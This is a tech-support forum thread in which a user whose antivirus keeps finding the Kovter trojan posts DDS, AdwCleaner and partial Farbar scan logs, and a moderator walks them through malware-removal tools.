Go Back   Tech Support Forum > Security Center > Virus/Trojan/Spyware Help > Resolved HJT Threads

User Tag List

MSE finds trojan every time

This is a discussion on MSE finds trojan every time within the Resolved HJT Threads forums, part of the Tech Support Forum category. Hey there, I ran a "quick scan" with Microsoft Security Essentials, and it found a trojan (Win32/Kovter.C!reg). It removes it


 
 
Thread Tools Search this Thread
Old 08-08-2015, 01:29 PM   #1
Registered Member
 
Join Date: Aug 2015
Posts: 27
OS: Windows 7 SP1



Hey there,

I ran a "quick scan" with Microsoft Security Essentials, and it found a trojan (Win32/Kovter.C!reg). It removes it apparently successfully, but upon scanning again it will find exactly the same trojan. I ran dds, what should I do now?¨

MSE screencap:



DDS.txt:
DDS (Ver_2012-11-20.01) - NTFS_AMD64
Internet Explorer: 11.0.9600.17909 BrowserJavaVersion: 11.31.2
Run by Mom at 21:10:07 on 2015-08-08
Microsoft Windows 7 Professional 6.1.7601.1.1252.44.1033.18.3894.2105 [GMT 1:00]
.
AV: Microsoft Security Essentials *Enabled/Updated* {B7ECF8CD-0188-6703-DBA4-AA65C6ACFB0A}
SP: Microsoft Security Essentials *Enabled/Updated* {0C8D1929-27B2-688D-E114-9117BD2BB1B7}
SP: Windows Defender *Disabled/Outdated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
.
============== Running Processes ===============
.
C:\Windows\system32\lsm.exe
C:\Windows\system32\svchost.exe -k DcomLaunch
C:\Windows\system32\svchost.exe -k RPCSS
c:\Program Files\Microsoft Security Client\MsMpEng.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
C:\Windows\system32\svchost.exe -k LocalService
C:\Windows\system32\svchost.exe -k netsvcs
C:\Windows\system32\svchost.exe -k GPSvcGroup
C:\Windows\system32\svchost.exe -k NetworkService
C:\Windows\Explorer.EXE
C:\Windows\System32\spoolsv.exe
C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
C:\Windows\system32\Dwm.exe
C:\Windows\system32\taskhost.exe
C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
C:\Windows\System32\svchost.exe -k utcsvc
C:\Windows\system32\svchost.exe -k imgsvc
C:\Windows\system32\taskeng.exe
C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
C:\Windows\System32\igfxtray.exe
C:\Windows\System32\hkcmd.exe
C:\Windows\System32\igfxpers.exe
C:\Program Files\Microsoft Security Client\msseces.exe
C:\Windows\system32\RunDll32.exe
C:\Windows\system32\GWX\GWX.exe
C:\Windows\system32\SearchIndexer.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation
C:\Windows\System32\svchost.exe -k LocalServicePeerNet
C:\Windows\SysWOW64\dllhost.exe
C:\Windows\SysWOW64\dllhost.exe
C:\Windows\servicing\TrustedInstaller.exe
C:\Windows\SysWOW64\ctfmon.exe
C:\Windows\system32\wuauclt.exe
C:\Windows\system32\taskhost.exe
C:\Windows\SysWOW64\explorer.exe
C:\Windows\system32\SearchProtocolHost.exe
C:\Windows\system32\SearchFilterHost.exe
C:\Windows\SysWOW64\explorer.exe
C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\System32\cscript.exe
.
============== Pseudo HJT Report ===============
.
uStart Page = hxxp://www.google.com/
mWinlogon: Userinit = userinit.exe
BHO: Groove GFS Browser Helper: {72853161-30C5-4D22-B7F9-0BBC1D38A37E} - C:\Program Files (x86)\Microsoft Office\Office14\GROOVEEX.DLL
BHO: Java(tm) Plug-In SSV Helper: {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files (x86)\Java\jre1.8.0_31\bin\ssv.dll
BHO: Office Document Cache Handler: {B4F3A835-0E21-4959-BA22-42B3008E02FF} - C:\Program Files (x86)\Microsoft Office\Office14\URLREDIR.DLL
BHO: Java(tm) Plug-In 2 SSV Helper: {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files (x86)\Java\jre1.8.0_31\bin\jp2ssv.dll
uRun: [Skype] "C:\Program Files (x86)\Skype\Phone\Skype.exe" /minimized /regrun
mRun: [BCSSync] "C:\Program Files (x86)\Microsoft Office\Office14\BCSSync.exe" /DelayServices
mRun: [Search Protection] C:\ProgramData\Search Protection\SearchProtection.exe
dRunOnce: [SPReview] "C:\Windows\System32\SPReview\SPReview.exe" /sp:1 /errorfwlink:"https://go.microsoft.com/fwlink/?LinkID=122915" /build:7601
StartupFolder: C:\Users\Mom\AppData\Roaming\MICROS~1\Windows\STARTM~1\Programs\Startup\MONITO~1.LNK - C:\Windows\System32\RunDll32.exe
mPolicies-Explorer: NoActiveDesktop = dword:1
mPolicies-Explorer: NoActiveDesktopChanges = dword:1
mPolicies-System: ConsentPromptBehaviorAdmin = dword:5
mPolicies-System: ConsentPromptBehaviorUser = dword:3
mPolicies-System: EnableUIADesktopToggle = dword:0
mPolicies-System: PromptOnSecureDesktop = dword:0
IE: E&xport to Microsoft Excel - C:\PROGRA~2\MICROS~3\Office14\EXCEL.EXE/3000
IE: Se&nd to OneNote - C:\PROGRA~2\MICROS~3\Office14\ONBttnIE.dll/105
IE: {2670000A-7350-4f3c-8081-5663EE0C6C49} - {48E73304-E1D6-4330-914C-F5F514E3486C} - C:\Program Files (x86)\Microsoft Office\Office14\ONBttnIE.dll
IE: {789FE86F-6FC4-46A1-9849-EDE0DB0C95CA} - {FFFDC614-B694-4AE6-AB38-5D6374584B52} - C:\Program Files (x86)\Microsoft Office\Office14\ONBttnIELinkedNotes.dll
TCP: NameServer = 194.168.4.100 194.168.8.100
TCP: Interfaces\{394329BF-2D3B-4468-A7DD-AF1FAB398EDA} : DHCPNameServer = 192.168.1.1
TCP: Interfaces\{C5CE6B46-A54D-42A2-9CA0-BC4CFE903BFF} : DHCPNameServer = 194.168.4.100 194.168.8.100
TCP: Interfaces\{C5CE6B46-A54D-42A2-9CA0-BC4CFE903BFF}\463766D25313430353 : DHCPNameServer = 192.168.1.1
TCP: Interfaces\{C5CE6B46-A54D-42A2-9CA0-BC4CFE903BFF}\6796277696E6D65646961613239333931373 : DHCPNameServer = 194.168.4.100 194.168.8.100
TCP: Interfaces\{C5CE6B46-A54D-42A2-9CA0-BC4CFE903BFF}\E4544574541425 : DHCPNameServer = 192.168.1.1
TCP: Interfaces\{C5CE6B46-A54D-42A2-9CA0-BC4CFE903BFF}\E474237657563747 : DHCPNameServer = 10.64.8.254
Filter: text/xml - {807573E5-5146-11D5-A672-00B0D022E945} - C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE14\MSOXMLMF.DLL
SSODL: WebCheck - <orphaned>
STS: Windows DreamScene - {E31004D1-A431-41B8-826F-E902F9D95C81} -
SEH: Groove GFS Stub Execution Hook - {B5A7F190-DDA6-4420-B3BA-52453494E6CD} - C:\Program Files (x86)\Microsoft Office\Office14\GROOVEEX.DLL
mASetup: {8A69D345-D564-463c-AFF1-A69D9E530F96} - "C:\Program Files (x86)\Google\Chrome\Application\44.0.2403.130\Installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level --multi-install --chrome
x64-BHO: Groove GFS Browser Helper: {72853161-30C5-4D22-B7F9-0BBC1D38A37E} - C:\Program Files\Microsoft Office\Office14\GROOVEEX.DLL
x64-BHO: Office Document Cache Handler: {B4F3A835-0E21-4959-BA22-42B3008E02FF} - C:\Program Files\Microsoft Office\Office14\URLREDIR.DLL
x64-Run: [IgfxTray] C:\Windows\System32\igfxtray.exe
x64-Run: [HotKeysCmds] C:\Windows\System32\hkcmd.exe
x64-Run: [Persistence] C:\Windows\System32\igfxpers.exe
x64-Run: [MSC] "c:\Program Files\Microsoft Security Client\msseces.exe" -hide -runkey
x64-IE: {2670000A-7350-4f3c-8081-5663EE0C6C49} - {48E73304-E1D6-4330-914C-F5F514E3486C} - C:\Program Files\Microsoft Office\Office14\ONBttnIE.dll
x64-IE: {789FE86F-6FC4-46A1-9849-EDE0DB0C95CA} - {FFFDC614-B694-4AE6-AB38-5D6374584B52} - C:\Program Files\Microsoft Office\Office14\ONBttnIELinkedNotes.dll
x64-Filter: text/xml - {807573E5-5146-11D5-A672-00B0D022E945} - C:\Program Files\Common Files\Microsoft Shared\OFFICE14\MSOXMLMF.DLL
x64-Notify: igfxcui - igfxdev.dll
x64-SSODL: WebCheck - <orphaned>
x64-SEH: Groove GFS Stub Execution Hook - {B5A7F190-DDA6-4420-B3BA-52453494E6CD} - C:\Program Files\Microsoft Office\Office14\GROOVEEX.DLL
.
================= FIREFOX ===================
.
FF - ProfilePath - C:\Users\Mom\AppData\Roaming\Mozilla\Firefox\Profiles\csjr5mn3.default\
FF - plugin: C:\PROGRA~2\MICROS~3\Office14\NPAUTHZ.DLL
FF - plugin: C:\PROGRA~2\MICROS~3\Office14\NPSPWRAP.DLL
FF - plugin: C:\Program Files (x86)\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll
FF - plugin: C:\Program Files (x86)\Google\Update\1.3.28.1\npGoogleUpdate3.dll
FF - plugin: C:\Program Files (x86)\Java\jre1.8.0_31\bin\dtplugin\npdeployJava1.dll
FF - plugin: C:\Program Files (x86)\Java\jre1.8.0_31\bin\plugin2\npjp2.dll
FF - plugin: c:\Program Files (x86)\Microsoft Silverlight\5.1.40416.0\npctrlui.dll
FF - plugin: C:\Windows\SysWOW64\Adobe\Director\np32dsw_1211151.dll
.
============= SERVICES / DRIVERS ===============
.
R0 MpFilter;Microsoft Malware Protection Driver;C:\Windows\System32\drivers\MpFilter.sys [2015-3-4 280376]
R1 MpKsl958ccaaf;MpKsl958ccaaf;C:\ProgramData\Microsoft\Microsoft Antimalware\Definition Updates\{B81BF9EF-C1F0-48CC-8D15-C1F0E6522CDF}\MpKsl958ccaaf.sys [2015-8-8 44928]
R2 DiagTrack;Diagnostics Tracking Service;C:\Windows\System32\svchost.exe -k utcsvc [2009-7-14 27136]
R3 HECIx64;Intel(R) Management Engine Interface;C:\Windows\System32\drivers\HECIx64.sys [2009-9-17 56344]
R3 RTL8167;Realtek 8167 NT Driver;C:\Windows\System32\drivers\Rt64win7.sys [2009-3-1 187392]
R3 rtl8192se;Realtek Wireless LAN 802.11n PCI-E NIC NT Driver;C:\Windows\System32\drivers\rtl8192se.sys [2011-6-20 1225832]
S2 clr_optimization_v4.0.30319_32;Microsoft .NET Framework NGEN v4.0.30319_X86;C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe [2014-4-12 103608]
S2 clr_optimization_v4.0.30319_64;Microsoft .NET Framework NGEN v4.0.30319_X64;C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe [2014-4-11 124088]
S2 SkypeUpdate;Skype Updater;C:\Program Files (x86)\Skype\Updater\Updater.exe [2015-6-25 327296]
S3 IEEtwCollectorService;Internet Explorer ETW Collector Service;C:\Windows\System32\ieetwcollector.exe [2015-7-15 114688]
S3 NisDrv;Microsoft Network Inspection System;C:\Windows\System32\drivers\NisDrvWFP.sys [2014-3-11 124568]
S3 NisSrv;Microsoft Network Inspection;C:\Program Files\Microsoft Security Client\NisSrv.exe [2015-4-30 366544]
S3 RdpVideoMiniport;Remote Desktop Video Miniport Driver;C:\Windows\System32\drivers\rdpvideominiport.sys [2014-6-1 19456]
S3 StorSvc;Storage Service;C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted [2009-7-14 27136]
S3 TsUsbFlt;TsUsbFlt;C:\Windows\System32\drivers\TsUsbFlt.sys [2014-6-1 56832]
S3 WatAdminSvc;Windows Activation Technologies Service;C:\Windows\System32\Wat\WatAdminSvc.exe [2014-5-24 1255736]
S3 WDC_SAM;WD SCSI Pass Thru driver;C:\Windows\System32\drivers\wdcsam64.sys [2015-1-27 14464]
S4 LULU Software CrashHandler;LULU Software CrashHandler;"C:\Program Files (x86)\Soda PDF 6\crash-handler-ws.exe" --> C:\Program Files (x86)\Soda PDF 6\crash-handler-ws.exe [?]
S4 Soda PDF 6;Soda PDF 6;"C:\Program Files (x86)\Soda PDF 6\ws.exe" --> C:\Program Files (x86)\Soda PDF 6\ws.exe [?]
.
=============== Created Last 30 ================
.
2015-08-08 19:30:33 75888 ----a-w- C:\ProgramData\Microsoft\Microsoft Antimalware\Definition Updates\{B81BF9EF-C1F0-48CC-8D15-C1F0E6522CDF}\offreg.836.dll
2015-08-08 19:30:31 44928 ----a-w- C:\ProgramData\Microsoft\Microsoft Antimalware\Definition Updates\{B81BF9EF-C1F0-48CC-8D15-C1F0E6522CDF}\MpKsl958ccaaf.sys
2015-08-08 06:02:58 1190000 ----a-w- C:\ProgramData\Microsoft\Microsoft Antimalware\Definition Updates\{2E39BF95-F2CC-4DA7-9A64-2CE1E2E3F167}\gapaengine.dll
2015-08-08 06:00:48 12222168 ----a-w- C:\ProgramData\Microsoft\Microsoft Antimalware\Definition Updates\{B81BF9EF-C1F0-48CC-8D15-C1F0E6522CDF}\mpengine.dll
2015-08-07 06:13:17 12222168 ----a-w- C:\ProgramData\Microsoft\Microsoft Antimalware\Definition Updates\Backup\mpengine.dll
2015-07-28 07:46:34 726528 ----a-w- C:\Windows\System32\generaltel.dll
2015-07-28 07:46:33 765440 ----a-w- C:\Windows\System32\invagent.dll
2015-07-28 07:46:33 67584 ----a-w- C:\Windows\System32\acmigration.dll
2015-07-28 07:46:33 433664 ----a-w- C:\Windows\System32\devinv.dll
2015-07-28 07:46:33 1145856 ----a-w- C:\Windows\System32\aeinv.dll
2015-07-28 07:46:33 1085440 ----a-w- C:\Windows\System32\appraiser.dll
2015-07-28 07:46:30 227328 ----a-w- C:\Windows\System32\aepdu.dll
2015-07-28 07:46:30 17856 ----a-w- C:\Windows\System32\CompatTelRunner.exe
2015-07-21 15:53:31 -------- d-----r- C:\Program Files (x86)\Skype
2015-07-21 06:48:26 41984 ----a-w- C:\Windows\System32\lpk.dll
2015-07-21 06:48:26 372224 ----a-w- C:\Windows\System32\atmfd.dll
2015-07-21 06:48:26 299008 ----a-w- C:\Windows\SysWow64\atmfd.dll
2015-07-21 06:48:25 70656 ----a-w- C:\Windows\SysWow64\fontsub.dll
2015-07-21 06:48:25 46080 ----a-w- C:\Windows\System32\atmlib.dll
2015-07-21 06:48:25 34304 ----a-w- C:\Windows\SysWow64\atmlib.dll
2015-07-21 06:48:25 25600 ----a-w- C:\Windows\SysWow64\lpk.dll
2015-07-21 06:48:25 14336 ----a-w- C:\Windows\System32\dciman32.dll
2015-07-21 06:48:25 10240 ----a-w- C:\Windows\SysWow64\dciman32.dll
2015-07-21 06:48:25 100864 ----a-w- C:\Windows\System32\fontsub.dll
2015-07-15 08:22:56 2427392 ----a-w- C:\Windows\System32\wininet.dll
2015-07-15 08:21:54 3242496 ----a-w- C:\Windows\System32\msi.dll
2015-07-15 08:21:54 1941504 ----a-w- C:\Windows\System32\authui.dll
2015-07-15 08:21:53 73216 ----a-w- C:\Windows\SysWow64\msiexec.exe
2015-07-15 08:21:53 2364416 ----a-w- C:\Windows\SysWow64\msi.dll
2015-07-15 08:21:53 1805824 ----a-w- C:\Windows\SysWow64\authui.dll
2015-07-15 08:21:53 128000 ----a-w- C:\Windows\System32\msiexec.exe
2015-07-15 08:21:53 112064 ----a-w- C:\Windows\System32\consent.exe
2015-07-15 08:21:52 70656 ----a-w- C:\Windows\System32\appinfo.dll
2015-07-15 08:21:52 504320 ----a-w- C:\Windows\System32\msihnd.dll
2015-07-15 08:21:52 337408 ----a-w- C:\Windows\SysWow64\msihnd.dll
2015-07-15 08:21:52 25088 ----a-w- C:\Windows\SysWow64\msimsg.dll
2015-07-15 08:21:52 25088 ----a-w- C:\Windows\System32\msimsg.dll
2015-07-10 13:39:12 -------- d--h--w- C:\$Windows.~BT
.
==================== Find3M ====================
.
2015-07-15 17:41:49 778416 ----a-w- C:\Windows\SysWow64\FlashPlayerApp.exe
2015-07-15 17:41:48 142512 ----a-w- C:\Windows\SysWow64\FlashPlayerCPLApp.cpl
2015-07-09 17:58:56 192000 ----a-w- C:\Windows\System32\wuwebv.dll
2015-07-09 17:58:55 98304 ----a-w- C:\Windows\System32\wudriver.dll
2015-07-09 17:58:55 3154944 ----a-w- C:\Windows\System32\wucltux.dll
2015-07-09 17:58:34 91136 ----a-w- C:\Windows\System32\WinSetupUI.dll
2015-07-09 17:58:25 12288 ----a-w- C:\Windows\System32\wu.upgrade.ps.dll
2015-07-09 17:58:20 37376 ----a-w- C:\Windows\System32\wuapp.exe
2015-07-09 17:43:25 93184 ----a-w- C:\Windows\SysWow64\wudriver.dll
2015-07-09 17:43:25 173056 ----a-w- C:\Windows\SysWow64\wuwebv.dll
2015-07-09 17:42:47 34816 ----a-w- C:\Windows\SysWow64\wuapp.exe
2015-07-05 10:08:23 300704 ------w- C:\Windows\System32\MpSigStub.exe
2015-07-04 18:07:11 2087424 ----a-w- C:\Windows\System32\ole32.dll
2015-07-04 17:48:36 1414656 ----a-w- C:\Windows\SysWow64\ole32.dll
2015-07-02 21:08:53 2724864 ----a-w- C:\Windows\SysWow64\mshtml.tlb
2015-07-02 20:40:34 2724864 ----a-w- C:\Windows\System32\mshtml.tlb
2015-07-01 20:56:03 95680 ----a-w- C:\Windows\System32\drivers\ksecdd.sys
2015-07-01 20:56:03 155584 ----a-w- C:\Windows\System32\drivers\ksecpkg.sys
2015-07-01 20:49:53 210944 ----a-w- C:\Windows\System32\wdigest.dll
2015-07-01 20:49:47 86528 ----a-w- C:\Windows\System32\TSpkg.dll
2015-07-01 20:49:45 29184 ----a-w- C:\Windows\System32\sspisrv.dll
2015-07-01 20:49:45 136192 ----a-w- C:\Windows\System32\sspicli.dll
2015-07-01 20:49:42 342016 ----a-w- C:\Windows\System32\schannel.dll
2015-07-01 20:49:42 28160 ----a-w- C:\Windows\System32\secur32.dll
2015-07-01 20:49:41 1216512 ----a-w- C:\Windows\System32\rpcrt4.dll
2015-07-01 20:49:23 309760 ----a-w- C:\Windows\System32\ncrypt.dll
2015-07-01 20:49:22 315392 ----a-w- C:\Windows\System32\msv1_0.dll
2015-07-01 20:49:11 729088 ----a-w- C:\Windows\System32\kerberos.dll
2015-07-01 20:49:11 1461760 ----a-w- C:\Windows\System32\lsasrv.dll
2015-07-01 20:48:34 44032 ----a-w- C:\Windows\System32\cryptbase.dll
2015-07-01 20:48:34 22016 ----a-w- C:\Windows\System32\credssp.dll
2015-07-01 20:47:38 31232 ----a-w- C:\Windows\System32\lsass.exe
2015-07-01 20:47:18 64000 ----a-w- C:\Windows\System32\auditpol.exe
2015-07-01 20:43:51 60416 ----a-w- C:\Windows\System32\msobjs.dll
2015-07-01 20:43:37 146432 ----a-w- C:\Windows\System32\msaudite.dll
2015-07-01 20:39:24 686080 ----a-w- C:\Windows\System32\adtschema.dll
2015-07-01 20:30:43 172032 ----a-w- C:\Windows\SysWow64\wdigest.dll
2015-07-01 20:30:40 65536 ----a-w- C:\Windows\SysWow64\TSpkg.dll
2015-07-01 20:30:37 248832 ----a-w- C:\Windows\SysWow64\schannel.dll
2015-07-01 20:30:37 22016 ----a-w- C:\Windows\SysWow64\secur32.dll
2015-07-01 20:30:33 221184 ----a-w- C:\Windows\SysWow64\ncrypt.dll
2015-07-01 20:30:32 259584 ----a-w- C:\Windows\SysWow64\msv1_0.dll
2015-07-01 20:30:27 552960 ----a-w- C:\Windows\SysWow64\kerberos.dll
2015-07-01 20:30:21 36864 ----a-w- C:\Windows\SysWow64\cryptbase.dll
2015-07-01 20:30:21 17408 ----a-w- C:\Windows\SysWow64\credssp.dll
2015-07-01 20:29:46 50176 ----a-w- C:\Windows\SysWow64\auditpol.exe
2015-07-01 20:29:34 96768 ----a-w- C:\Windows\SysWow64\sspicli.dll
2015-07-01 20:29:34 665088 ----a-w- C:\Windows\SysWow64\rpcrt4.dll
2015-07-01 20:27:04 60416 ----a-w- C:\Windows\SysWow64\msobjs.dll
2015-07-01 20:26:52 146432 ----a-w- C:\Windows\SysWow64\msaudite.dll
2015-07-01 20:24:59 686080 ----a-w- C:\Windows\SysWow64\adtschema.dll
2015-07-01 19:27:34 159232 ----a-w- C:\Windows\System32\drivers\mrxsmb.sys
2015-07-01 19:26:43 290816 ----a-w- C:\Windows\System32\drivers\mrxsmb10.sys
2015-07-01 19:26:37 129024 ----a-w- C:\Windows\System32\drivers\mrxsmb20.sys
2015-06-27 02:47:11 814080 ----a-w- C:\Windows\System32\jscript9diag.dll
2015-06-27 02:43:26 5923840 ----a-w- C:\Windows\System32\jscript9.dll
2015-06-27 01:58:17 620032 ----a-w- C:\Windows\SysWow64\jscript9diag.dll
2015-06-27 01:39:37 4520448 ----a-w- C:\Windows\SysWow64\jscript9.dll
2015-06-25 08:57:44 3207168 ----a-w- C:\Windows\System32\win32k.sys
2015-06-24 00:29:00 1217192 ----a-w- C:\Windows\SysWow64\FM20.DLL
2015-06-20 2050 4096 ----a-w- C:\Windows\System32\ieetwcollectorres.dll
2015-06-20 19:50:10 66560 ----a-w- C:\Windows\System32\iesetup.dll
2015-06-20 19:49:17 48640 ----a-w- C:\Windows\System32\ieetwproxystub.dll
2015-06-20 19:49:09 417792 ----a-w- C:\Windows\System32\html.iec
2015-06-20 19:49:08 584192 ----a-w- C:\Windows\System32\vbscript.dll
2015-06-20 19:48:29 88064 ----a-w- C:\Windows\System32\MshtmlDac.dll
2015-06-20 19:34:46 114688 ----a-w- C:\Windows\System32\ieetwcollector.exe
2015-06-20 19:34:45 144384 ----a-w- C:\Windows\System32\ieUnatt.exe
2015-06-20 19:25:28 968704 ----a-w- C:\Windows\System32\MsSpellCheckingFacility.exe
2015-06-20 19:13:07 77824 ----a-w- C:\Windows\System32\JavaScriptCollectionAgent.dll
2015-06-20 18:46:53 1359360 ----a-w- C:\Windows\System32\mshtmlmedia.dll
2015-06-20 18:46:48 2125824 ----a-w- C:\Windows\System32\inetcpl.cpl
2015-06-19 18:25:41 504320 ----a-w- C:\Windows\SysWow64\vbscript.dll
2015-06-19 18:25:35 62464 ----a-w- C:\Windows\SysWow64\iesetup.dll
2015-06-19 18:24:43 47616 ----a-w- C:\Windows\SysWow64\ieetwproxystub.dll
2015-06-19 18:24:27 341504 ----a-w- C:\Windows\SysWow64\html.iec
2015-06-19 18:23:26 64000 ----a-w- C:\Windows\SysWow64\MshtmlDac.dll
2015-06-19 18:13:10 115712 ----a-w- C:\Windows\SysWow64\ieUnatt.exe
2015-06-19 17:57:45 60416 ----a-w- C:\Windows\SysWow64\JavaScriptCollectionAgent.dll
2015-06-19 17:40:04 2052608 ----a-w- C:\Windows\SysWow64\inetcpl.cpl
2015-06-19 17:39:13 1155072 ----a-w- C:\Windows\SysWow64\mshtmlmedia.dll
2015-06-19 17:15:43 1951232 ----a-w- C:\Windows\SysWow64\wininet.dll
2015-06-17 17:47:05 404992 ----a-w- C:\Windows\System32\gdi32.dll
2015-06-17 17:37:03 312320 ----a-w- C:\Windows\SysWow64\gdi32.dll
2015-06-11 17:57:36 53248 ----a-w- C:\Windows\SysWow64\tsgqec.dll
2015-06-11 17:57:35 856064 ----a-w- C:\Windows\SysWow64\rdvidcrl.dll
2015-06-11 17:57:35 6131200 ----a-w- C:\Windows\SysWow64\mstscax.dll
2015-06-11 17:56:55 7077376 ----a-w- C:\Windows\System32\mstscax.dll
2015-06-11 17:56:55 62976 ----a-w- C:\Windows\System32\tsgqec.dll
2015-06-11 17:56:55 1057792 ----a-w- C:\Windows\System32\rdvidcrl.dll
2015-06-11 13:15:53 429568 ----a-w- C:\Windows\System32\wksprt.exe
2015-06-09 18:03:22 3180544 ----a-w- C:\Windows\System32\rdpcorets.dll
2015-06-09 18:03:22 16384 ----a-w- C:\Windows\System32\RdpGroupPolicyExtension.dll
2015-06-02 00:07:15 254976 ----a-w- C:\Windows\System32\cewmdm.dll
2015-06-01 23:47:09 210432 ----a-w- C:\Windows\SysWow64\cewmdm.dll
2015-05-25 18:24:00 5569984 ----a-w- C:\Windows\System32\ntoskrnl.exe
2015-05-25 18:21:21 1728960 ----a-w- C:\Windows\System32\ntdll.dll
2015-05-25 18:19:27 362496 ----a-w- C:\Windows\System32\wow64win.dll
2015-05-25 18:19:27 243712 ----a-w- C:\Windows\System32\wow64.dll
2015-05-25 18:19:27 13312 ----a-w- C:\Windows\System32\wow64cpu.dll
.
============= FINISH: 21:11:53.43 ===============
Attached Files
File Type: txt attach.txt (12.3 KB, 27 views)
kkollage is offline  
Sponsored Links
Advertisement
 
Old 08-10-2015, 06:53 PM   #2
Security Team
Moderator, Analyst
Rangemaster, TSF Academy
 
chemist's Avatar

Microsoft Most Valuable Professional
 
Join Date: Oct 2007
Location: Georgia
Posts: 29,790
OS: XP/Win7/Win10



Hello and Welcome to TSF.

If you haven't already, please Subscribe to this Thread to get immediate notification of replies as soon as they are posted. To do this click Thread Tools, then click Subscribe to this Thread. Make sure it is set to Instant notification by email, then click Add Subscription.

Please note that the forum is very busy and if I don't hear from you within three days this thread will be closed.

------------------------------------------------------

Please note that these fixes are not instantaneous. Most infections require more than one round to properly eradicate.

Please stay with me until given the 'all clear' even if symptoms seemingly abate.

Kindly follow my instructions and please do no fixing on your own or running of scanners unless requested by a helper.

------------------------------------------------------

If there are any personal files, pics, etc. on your computer you cannot live without, back them up now just as a precaution.

Emergency Backup Procedure - Tech Support Forum

Also, if you haven't done so already, create a system repair disc. It's really easy and quick.

How To Create a Windows 7 System Repair Disc [Easy]

------------------------------------------------------

*Note - Do NOT upgrade your OS to Windows 10 until your machine is clean, and we have uninstalled all our removal tools. Thanks.

------------------------------------------------------

Please download AdwCleaner from here and save it to your desktop.
  • Do NOT click the green 'Download' button(if visible).
  • Click the blue 'Download now @bleepingcomputer' button.
  • Run AdwCleaner and select Scan
  • Once the Scan is done, select Cleaning
  • Once done it will ask to reboot, please allow the reboot.
  • On reboot, a log will be produced. It can also be found at C:\AdwCleaner\AdwCleaner[S#].txt
  • Please copy/paste the contents of the log in your next reply.
------------------------------------------------------

Please download Farbar Recovery Scan Tool and save it to your desktop.
  • Double-click FRST64 to run it. When the tool opens click Yes to the disclaimer.
  • Make sure the Addition.txt button is ticked.
  • Press Scan button.
  • It will make a log (FRST.txt) in the same directory the tool is run. Please copy and paste it to your reply.
  • The first time the tool is run, it also makes another log (Addition.txt). Please attach it to your reply.
------------------------------------------------------
__________________
Our services are free, but you may contribute to the author of ComboFix via PayPal

Proud member of UNITE

Microsoft MVP - Consumer Security 2014, 2015
chemist is offline  
Old 08-11-2015, 01:13 PM   #3
Registered Member
 
Join Date: Aug 2015
Posts: 27
OS: Windows 7 SP1



Hi
How do I subscribe to this thread? I am ready to follow directions for the fix. Thanks (doing backup now) OK done...
Ahh. I see the next step is to create a system repair disc. I have a 4 disc set of ''product recovery'' - is that the same thing?
kkollage is offline  
Sponsored Links
Advertisement
 
Old 08-11-2015, 03:27 PM   #4
Registered Member
 
Join Date: Aug 2015
Posts: 27
OS: Windows 7 SP1



# AdwCleaner v4.208 - Logfile created 11/08/2015 at 23:02:07
# Updated 09/07/2015 by Xplode
# Database : 2015-08-11.1 [Server]
# Operating system : Windows 7 Professional Service Pack 1 (x64)
# Username : Mom - SAVAGE
# Running from : C:\Users\Mom\Downloads\AdwCleaner.exe
# Option : Cleaning

***** [ Services ] *****


***** [ Files / Folders ] *****


***** [ Scheduled tasks ] *****








***** [ Shortcuts ] *****


***** [ Registry ] *****

Key Deleted : HKLM\SOFTWARE\Google\Chrome\Extensions\oejkcgajlodefenbbjdnaiahmbnnoole
Value Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run [Search Protection]
Key Deleted : [x64] HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{3BD44F0E-0596-4008-AEE0-45D47E3A8F0E}
Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Toolbar Cleaner

***** [ Web browsers ] *****

-\\ Internet Explorer v11.0.9600.17909


-\\ Mozilla Firefox v39.0 (x86 en-GB)


-\\ Google Chrome v44.0.2403.130


*************************

AdwCleaner[R0].txt - [1157 bytes] - [11/08/2015 22:53:15]
AdwCleaner[S0].txt - [1086 bytes] - [11/08/2015 23:02:07]

########## EOF - C:\AdwCleaner\AdwCleaner[S0].txt - [1145 bytes] ##########

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version:11-08-2015 02
Ran by Mom (administrator) on SAVAGE (11-08-2015 23:13:18)
Running from C:\Users\Mom\Downloads
Loaded Profiles: Mom (Available Profiles: Mom)
Platform: Windows 7 Professional Service Pack 1 (X64) Language: English (United States)
Internet Explorer Version 11 (Default browser: FF)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: FRST Tutorial - How to use Farbar Recovery Scan Tool - Geeks to Go Forum

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(Microsoft Corporation) C:\Program Files\Microsoft Security Client\MsMpEng.exe
(Microsoft Corporation) C:\Windows\System32\msiexec.exe
(Intel Corporation) C:\Windows\System32\igfxtray.exe
(Intel Corporation) C:\Windows\System32\hkcmd.exe
(Intel Corporation) C:\Windows\System32\igfxpers.exe
(Microsoft Corporation) C:\Program Files\Microsoft Security Client\msseces.exe
(Skype Technologies S.A.) C:\Program Files (x86)\Skype\Phone\Skype.exe
(Microsoft Corporation) C:\Windows\System32\rundll32.exe
(Microsoft Corporation) C:\Windows\System32\GWX\GWX.exe
(Microsoft Corporation) C:\Program Files\Microsoft Security Client\NisSrv.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\System32\prevhost.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
